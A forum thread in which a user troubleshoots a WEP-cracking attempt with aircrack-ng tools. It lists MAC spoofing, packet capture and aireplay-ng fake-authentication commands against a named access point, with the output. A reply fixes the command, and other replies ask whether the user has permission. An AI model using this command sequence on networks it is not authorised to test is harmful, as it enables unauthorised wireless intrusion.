Help Correct My Attack

I have a netgear wg511t pcmcia card. I have done a successful WEP crack before using this card and this method but for some reason this isn't working with the particular AP in question.

Step 1

Code:

---

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0

---

Step 2

Code:

---

airodump-ng ath0

---

Returns..

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0F:3D:29:86:6F 46 100 6519 1362 1 6 54. WEP WEP default
00:15:E9:E4:28:C9 6 1 4968 24 0 6 54. WEP WEP default
00:19:5B:E0:95:58 17 0 4587 0 0 6 54. WEP WEP OPN PenTestNetwork
00:11:95:2C:51:E4 1 0 233 8 0 6 54. OPN hawkes
00:90:4C:7E:00:10 -1 0 0 0 0 6 -1 telstra

Step 3

Code:

---

airodump-ng -c 6 -w dumpfile --bssid 00:19:5B:E0:95:58 ath0
aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0

---

Now it is the aireplay-ng command which isn't being successful. I get,

Code:

---

bt ~ # aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0
13:09:40  Sending Authentication Request
13:09:40  Authentication successful
13:09:40  Sending Association Request
13:09:45  Sending Authentication Request
13:09:45  Authentication successful
13:09:45  Sending Association Request
13:09:50  Sending Authentication Request
13:09:50  Authentication successful
13:09:50  Sending Association Request
13:09:55  Sending Authentication Request
13:09:55  Authentication successful
13:09:55  Sending Association Request
13:10:00  Sending Authentication Request
13:10:00  Authentication successful
13:10:00  Sending Association Request
13:10:05  Sending Authentication Request
13:10:05  Authentication successful
13:10:05  Sending Association Request
13:10:10  Sending Authentication Request
13:10:10  Authentication successful
13:10:10  Sending Association Request
13:10:15  Sending Authentication Request
13:10:15  Authentication successful
13:10:15  Sending Association Request
13:10:20  Sending Authentication Request
13:10:20  Authentication successful
13:10:20  Sending Association Request
13:10:25  Sending Authentication Request
13:10:25  Authentication successful
13:10:25  Sending Association Request
13:10:30  Sending Authentication Request
13:10:30  Authentication successful
13:10:30  Sending Association Request
13:10:35  Sending Authentication Request
13:10:36  Authentication successful
13:10:36  Sending Association Request
13:10:43  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).

---

Can anyone help me out? Give me some ideas?

your AP or someone else's? do you have permission?

sounds like the victim ap have mac filtering enabled........

Not being a troll or anything but I think its because you are too far away m8t. Because MAC filtering wouldn't even let you associate at all.

also:

MAC: 00:19:5B:E0:95:58
PWR:17
RXQ: 0

Very low signal!!!

And Because of that make me think that the AP in question is not yours so I'm not going to say anymore.

I appologize if I am wrong :D

How far are you from the AP and what kind of model is the AP?

Quote:

---

Originally Posted by Dr_GrEeN

Not being a troll or anything but I think its because you are too far away m8t. Because MAC filtering wouldn't even let you associate at all.

also:

MAC: 00:19:5B:E0:95:58
PWR:17
RXQ: 0

Very low signal!!!

And Because of that make me think that the AP in question is not yours so I'm not going to say anymore.

I appologize if I am wrong :D

---

Apology accepted :p

Quote:

---

Originally Posted by swc666

How far are you from the AP and what kind of model is the AP?

---

It's a D-Link and it's down 1 flight of stairs and about 20 metres away. The router is in my dad's study and i was sitting in my room, upstairs on the other side of the house.

The PWR level was fluctuating between 15 and 25. So moving closer should help?

My dad said he doesn't even know what mac filtering is so i'm pretty sure it's not enabled.

You are using the BSSID for the ESSID bro.

the -e argument is where you put the ESSID and you put the MAC address there, thats why its partially successfull but ultimately fails.

Put the ESSID after the -e (its case sensitive) and try again, should work

Follow this tut... if there's any issues after then post again

Quote:

---

Originally Posted by SonyUSA

You are using the BSSID for the ESSID bro.

the -e argument is where you put the ESSID and you put the MAC address there, thats why its partially successfull but ultimately fails.

Put the ESSID after the -e (its case sensitive) and try again, should work

---

Omg i have serious problems :P Thanks alot dude. Can't believe i missed that.


Thanks swc666... that's more or less what i was following except i messed up the whole essid thing as SonyUSA discovered.